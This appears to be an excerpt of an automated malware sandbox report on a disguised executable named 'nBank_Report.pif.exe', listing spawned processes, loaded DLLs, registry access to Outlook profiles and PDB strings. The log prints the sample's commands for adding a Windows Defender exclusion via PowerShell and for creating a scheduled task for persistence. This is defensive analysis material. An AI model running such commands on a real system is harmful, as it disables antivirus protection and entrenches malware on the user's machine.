              Source: C:\Users\user\Desktop\nBank_Report.pif.exeFile read: C:\Users\user\Desktop\nBank_Report.pif.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\nBank_Report.pif.exe "C:\Users\user\Desktop\nBank_Report.pif.exe"
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exe"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VtPPJdSqnkbmja" /XML "C:\Users\user\AppData\Local\Temp\tmp6F97.tmp"
              Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeProcess created: C:\Users\user\Desktop\nBank_Report.pif.exe "C:\Users\user\Desktop\nBank_Report.pif.exe"
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeProcess created: C:\Users\user\Desktop\nBank_Report.pif.exe "C:\Users\user\Desktop\nBank_Report.pif.exe"
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
              Source: unknownProcess created: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exe C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exe
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VtPPJdSqnkbmja" /XML "C:\Users\user\AppData\Local\Temp\tmp8A91.tmp"
              Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeProcess created: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exe "C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exe"
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5500 -s 2540
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exe"Jump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VtPPJdSqnkbmja" /XML "C:\Users\user\AppData\Local\Temp\tmp6F97.tmp"Jump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeProcess created: C:\Users\user\Desktop\nBank_Report.pif.exe "C:\Users\user\Desktop\nBank_Report.pif.exe"Jump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeProcess created: C:\Users\user\Desktop\nBank_Report.pif.exe "C:\Users\user\Desktop\nBank_Report.pif.exe"Jump to behavior
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\VtPPJdSqnkbmja" /XML "C:\Users\user\AppData\Local\Temp\tmp8A91.tmp"Jump to behavior
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeProcess created: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exe "C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exe"Jump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeSection loaded: dwrite.dllJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeSection loaded: windowscodecs.dllJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeSection loaded: slc.dllJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeSection loaded: windowscodecs.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeSection loaded: dwrite.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeSection loaded: windowscodecs.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeSection loaded: slc.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeSection loaded: mscoree.dll
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeSection loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeSection loaded: version.dll
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeSection loaded: windows.storage.dll
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeSection loaded: wldp.dll
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeSection loaded: profapi.dll
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeSection loaded: cryptsp.dll
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeSection loaded: rsaenh.dll
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeSection loaded: cryptbase.dll
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeSection loaded: rasapi32.dll
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeSection loaded: rasman.dll
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeSection loaded: rtutils.dll
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeSection loaded: mswsock.dll
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeSection loaded: winhttp.dll
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeSection loaded: ondemandconnroutehelper.dll
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeSection loaded: iphlpapi.dll
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeSection loaded: dhcpcsvc6.dll
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeSection loaded: dhcpcsvc.dll
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeSection loaded: dnsapi.dll
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeSection loaded: winnsi.dll
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeSection loaded: rasadhlp.dll
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeSection loaded: fwpuclnt.dll
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeSection loaded: secur32.dll
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeSection loaded: sspicli.dll
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeSection loaded: schannel.dll
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeSection loaded: mskeyprotect.dll
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeSection loaded: ntasn1.dll
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeSection loaded: ncrypt.dll
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeSection loaded: ncryptsslp.dll
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeSection loaded: msasn1.dll
              Source: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.exeSection loaded: gpapi.dll
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
              Source: C:\Users\user\Desktop\nBank_Report.pif.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
              Source: nBank_Report.pif.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
              Source: nBank_Report.pif.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: nBank_Report.pif.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Binary string: HP[o(C:\Windows\fLpg.pdb source: VtPPJdSqnkbmja.exe, 0000000D.00000002.1712961862.0000000000987000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: C:\Windows\fLpg.pdbpdbLpg.pdb source: VtPPJdSqnkbmja.exe, 0000000D.00000002.1717769063.0000000006130000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: VtPPJdSqnkbmja.exe, 0000000D.00000002.1713708218.0000000000C67000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Xml.ni.pdb source: WER8EF6.tmp.dmp.17.dr
              Source: Binary string: \??\C:\Windows\exe\fLpg.pdb{ source: VtPPJdSqnkbmja.exe, 0000000D.00000002.1717769063.0000000006130000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: symbols\exe\fLpg.pdbgo7k source: VtPPJdSqnkbmja.exe, 0000000D.00000002.1712961862.0000000000987000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: VtPPJdSqnkbmja.exe, 0000000D.00000002.1717769063.0000000006130000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.ni.pdbRSDS source: WER8EF6.tmp.dmp.17.dr
              Source: Binary string: C:\Users\user\AppData\Roaming\VtPPJdSqnkbmja.PDB source: VtPPJdSqnkbmja.exe, 0000000D.00000002.1712961862.0000000000987000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: fLpg.pdbs\fLpg.pdbpdbLpg.pdbpg.pdbP source: VtPPJdSqnkbmja.exe, 0000000D.00000002.1712961862.0000000000987000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: !!.pdb"s source: VtPPJdSqnkbmja.exe, 0000000D.00000002.1712961862.0000000000987000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: System.Xml.pdbp source: WER8EF6.tmp.dmp.17.dr
              Source: Binary string: System.Configuration.ni.pdb source: WER8EF6.tmp.dmp.17.dr
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: VtPPJdSqnkbmja.exe, 0000000D.00000002.1713708218.0000000000C67000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\exe\fLpg.pdbk source: VtPPJdSqnkbmja.exe, 0000000D.00000002.1717769063.0000000006130000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: mscorlib.ni.pdbRSDS source: WER8EF6.tmp.dmp.17.dr
              Source: Binary string: System.Configuration.pdb source: WER8EF6.tmp.dmp.17.dr
              Source: Binary string: fLpg.pdb``w` source: VtPPJdSqnkbmja.exe, 0000000D.00000002.1712961862.0000000000987000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: System.Xml.pdb source: WER8EF6.tmp.dmp.17.dr
              Source: Binary string: System.pdb source: WER8EF6.tmp.dmp.17.dr
              Source: Binary string: System.Xml.ni.pdbRSDS# source: WER8EF6.tmp.dmp.17.dr
              Source: Binary string: \??\C:\Windows\fLpg.pdb source: VtPPJdSqnkbmja.exe, 0000000D.00000002.1717769063.0000000006130000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: Microsoft.VisualBasic.pdb source: WER8EF6.tmp.dmp.17.dr
